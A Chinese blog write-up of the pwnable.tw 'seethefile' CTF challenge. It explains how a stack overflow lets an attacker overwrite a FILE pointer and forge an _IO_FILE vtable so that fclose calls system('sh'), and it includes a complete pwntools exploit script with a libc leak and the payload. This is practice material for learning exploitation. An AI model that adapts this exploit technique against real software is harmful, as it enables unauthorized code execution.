pwnable.tw seethefile 经验总结

最新推荐文章于 2023-12-28 16:37:51 发布
最新推荐文章于 2023-12-28 16:37:51 发布
阅读量535 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/103056493
版权

关于伪造FILE结构体来getshell的题目, 又学到了点知识

程序逻辑分析:
在这里插入图片描述
程序的逻辑简单,简单的打开文件读取文件的操作, 但是对于flag进行了严格的过滤, 无法直接通过打开flag文件来读取flag, 在switch分支5处输入的name存在明显的溢出, 观察发现fp就在name地址下方, 可以通过溢出来控制fp指针, 接下来就是伪造fake FILE结构体了

原理:
fp 指针指向的结构体为
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
1.file 为一个指向_IO_FILE结构体的指针
结构体所占的大小可写程序测试:
在这里插入图片描述
在这里插入图片描述
2. vtable 为一个指向_IO_jump_t 结构体的虚表指针, _IO_jump_t 中的JUMP_FIELD是一个宏, 这个宏接收两个参数, 第一个为类型, 第二个为变量名
这些变量中存放着函数指针, 所以可以通过覆盖这些指针来执行希望执行的函数

fclose 源码分析
在这里插入图片描述
_IO_IS_FILEBUF是一个宏, 定义为0x2000, 第一处通过让_IO_FILE结构体中的flag 与其进行与操作, 不为零则会执行_IO_file_close_it, 那么目的为绕过这个 if 检查条件, 并将_IO_FINISH覆盖为system的地址,再调用_IO_FINISH, 这样就可以getshell了

EXP:

from pwn import *

context(arch='i386', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
debug = 0
d = 1

if debug == 1:
	p = process("./seethefile")
	if d == 1:
		gdb.attach(p)
else:
	p = remote("chall.pwnable.tw", 10200)

def Open(name):
	p.sendlineafter("Your choice :", str(1))
	p.sendlineafter("What do you want to see :", name)

def read():
	p.sendlineafter("Your choice :", str(2))

def show():
	p.sendlineafter("Your choice :", str(3))

Open("/proc/self/maps")

read()
show()

read()
show()

elf = ELF("./seethefile")
libc = ELF("stf_libc_32.so.6")
raw_input()
p.recvline()
leak = int('0x'+p.recvline()[:8], 16)
#libc_base = leak - (0xf7f0d000 - 0xf7d5d000)
system = leak + libc.symbols['system']
log.info("leak -> " + hex(leak))
#log.info("libc_base -> " + hex(libc_base))
log.info("system -> " + hex(system))

name = elf.symbols['name']
payload = [
		0, 0, 
		system, 0, 0, 0, 0, 0,
		name + 0x28, 0,
		u32('\x80\x80||'), u32('sh\0\0')
		]

p.sendlineafter("Your choice :", str(5))
p.sendlineafter("Leave your name :", flat(payload).ljust(0x94+0x28, '\0') + p32(name))
p.interactive()

exp是参考这个师傅的写出来的
http://blog.eonew.cn/archives/1123

结果:
在这里插入图片描述

记录一下, 64位ubuntu16在本地进行动态调试32位程序的的时候算出来的libc基址与目标文件的libc基址不一样, 要一样的话应该要搭一个docker去调试
在这里插入图片描述

苍崎青子
关注
专栏目录
seethefile 记录
weixin_55190422的博客
12-18 322
老套路放进IDA分析发现 此处是一个明显的栈溢出。 我们可以通过溢出name来覆盖fp 1)openfile:打开文件,文件指针就是fp,不能打开文件名为flag的文件 2)readfile:从fp读取0x18F个字节到magicbuf上 3)closefile:关闭文件,指针fp赋0 4)writefile:只是一个打印函数,而不能写入,不能打印{flag,FLAG,}名的文件,如下 伪造FILE结构体来getshell的题目 exp: from pwn import * ...
pwnable.tw——hacknote
40KO的博客
02-24 835
很少做pwn,之前也只懂点rop,现在跟着练练pwn的堆利用吧,pwnable.tw上的一题hacknote,比较纯粹的uaf题目,还好不久前看了点glibc内存管理的东西,可以派上用场了。 逆向很轻松,那为什么不直接给源码呢。。。根据add_note函数很容易了解note的结构体特征 unsigned int add_node() { note *v0; // ebx signed...
64位c语言调用32位glibc,glibc fclose源代码阅读及伪造_IO_FILE利用fclose实现任意地址执行...
weixin_34952710的博客
05-20 424
简介最近学习了一下_IO_FILE的利用,刚好在pwnable.tw上碰到一道相关的题目。拿来做了一下,遇到了一些困难,不过顺利解决了,顺便读了一波相关源码,对_IO_FILE有了更深的理解。文章分为三部分,分别是利用原理、实例和源码阅读。源码部分比较无聊所以我把它放在了最后。原理原理我们使用fopen打开一个文件会在堆上分配一块内存区域用来存储FILE结构体,存储的结构体包含两个部分,前一部分为...
pwnable.tw 9 seethefile [250 pts]
qq_42192672的博客
12-04 796
之前做了五道题直接做自闭了,各种手写shellcode,学到了很多姿势,这是一道文件题,没接触过,来挑战一下…… no canary found!!!!!! 拖进IDA分析 一共有五个功能 有一个明显的栈溢出 我们可以通过溢出name来覆盖fp 1)openfile:打开文件,文件指针就是fp,不能打开文件名为flag的文件 2)readfile:从fp读取0x18F个字节...
pwnable.twseethefile
weixin_30432179的博客
09-20 118
一开始特别懵的一道题。 main函数中一共4个功能,openfile、readfile、writefile、closefile。 其中,在最后退出时有一个明显的溢出,是scanf("%s",&name); name位于bss段上,name下面有一个fp用于存储文件指针,可以被覆盖。 再看其他函数: openfile.只有一个简单的输入并打开,保存文件指针在bss段上的fp...
(BUUCTF)pwnable_seethefile
最新发布
xy1458214551的博客
12-28 389
BUUCTF的pwnable_seethefile题解
劫持vtable修改程序执行流——pwnable seethefile
weixin_46521144的博客
07-22 381
前置知识 vtable vtable是和file结构体并列的一段内容,是函数指针数组,其中包含了对file的一些操作函数。 以下来自ctf-wiki 在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8 以下是vtable的实际结构,如图所示,我们需要关注的是close部分。也就是关闭文件时将会调用的函数。 ## 劫持原理 以下内容摘自https://www.jianshu.com/p/2e00afb01606 分析close函数,最关键的利用点在这里 注意
pwnable.kr seethefile
doudoudedi
12-14 286
忙里偷闲-------一道伪造_IO_file结构体的题目 发现文件结构体指针直接放在bss段上我们可以修改,很明显就是让我们伪造_IO_FILE结构体了,根据程序逻辑我们需要仔细阅读fclose函数分析源码ing _IO_new_fclose (_IO_FILE *fp) { int status; CHECK_FILE(fp, EOF); #if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1) /* We desperately try to help
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 629
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
pwnable.tw第一题start
计算机小白的博客
08-09 5594
这应该是我做的第一道pwn的题了(虽然也是看了很多别人的WriteUp),想了两天,才终于弄清楚了,在这里记录一下。拿到手以后发现是一个ELF文件,就放进kali虚拟机里面运行一下先: 程序启动以后打印一段话,然后让你输入,就完事了。 再放入IDA中,观察: 检测栈有点问题,不能够F5,强行看汇编。。。 5个push是打印出来的那句话, Let’s start the CTF: 下面一句
Install_TW7.0.4.1_Enterprise_Liunx.bin.zip
10-29
例如,检查服务状态,可以使用`systemctl status tw-server`(假设服务名为tw-server)。 8. **配置与使用**:首次使用时,可能需要按照官方文档或安装向导的指示进行一些基本的配置,如设置数据库连接、许可证信息...
JavaApplet打印的时候报错:Error printing report.See the console for details
热门推荐
似水流年
06-19 2万+
西安机保很多客户端程序在使用Jasper打印的时候,客户端Applet都报 Error printing report.See the console for details。   点击右下角的咖啡图标,打开JRE的控制台,在控制台中有如下信息: java.security.AccessControlException: access denied (java.lang.RuntimeP
BUUCTF pwn 四月刷题
coco的博客
04-07 860
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4891
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3046
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
xctf 攻防世界-forgot writeup
qq_43189757的博客
07-08 1776
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点 可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数 发现目标函数,接下来我的想法是利用缓冲...
2019 红帽杯 three 经验总结
qq_43189757的博客
11-11 1407
这题感觉要对汇编语言要比较熟悉会更容易做出来… 程序逻辑分析: 前两个函数通过读取flag文件的内容, 并将存放flag的chunk的地址放入bss段中 在程序中可以输入3个字节的指令, 之后再执行这三个指令, 所以目的是植入3个字节的shellcode来获取flag 利用思路: 通过调试发现在执行call eax 之前, ecx寄存器中存放的是bss段的地址0x80f6cc0, 而前面...
pwnable.tw 3x17 经验总结
qq_43189757的博客
10-25 988
这题涨姿势了, 学到了不少东西, 对静态链接的题目也有了一点了解 参考的wp: 和媳妇一起学pwn之3x17(不得不说这名字真的sao… , 不过文章写的挺好的 分析: 由于程序是静态编译的, 把符号表给剥离了, 所以无法直接找到main函数, 可以先观察程序的入口点start 在地址0x0000000000401A74处调用了一个函数, 而这个函数其实就是libc_start_main函数 l...
2019 湖湘杯 HackNote 经验总结
qq_43189757的博客
11-11 964
静态链接的题目, 又学到了一点 程序保护: 保护全关 程序逻辑分析: 通过观察start 的汇编代码找到main函数的地址 箭头
开发Internet Explorer右键菜单:0rz.tw缩网址示例
本文档详细介绍了如何在Internet Explorer浏览器中自定义右键功能表(ContextMenu),以0rz.tw的缩网址功能为例进行说明。在开发过程中,关键步骤包括以下几个方面: 1. 注册表结构:Internet Explorer的右键菜单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值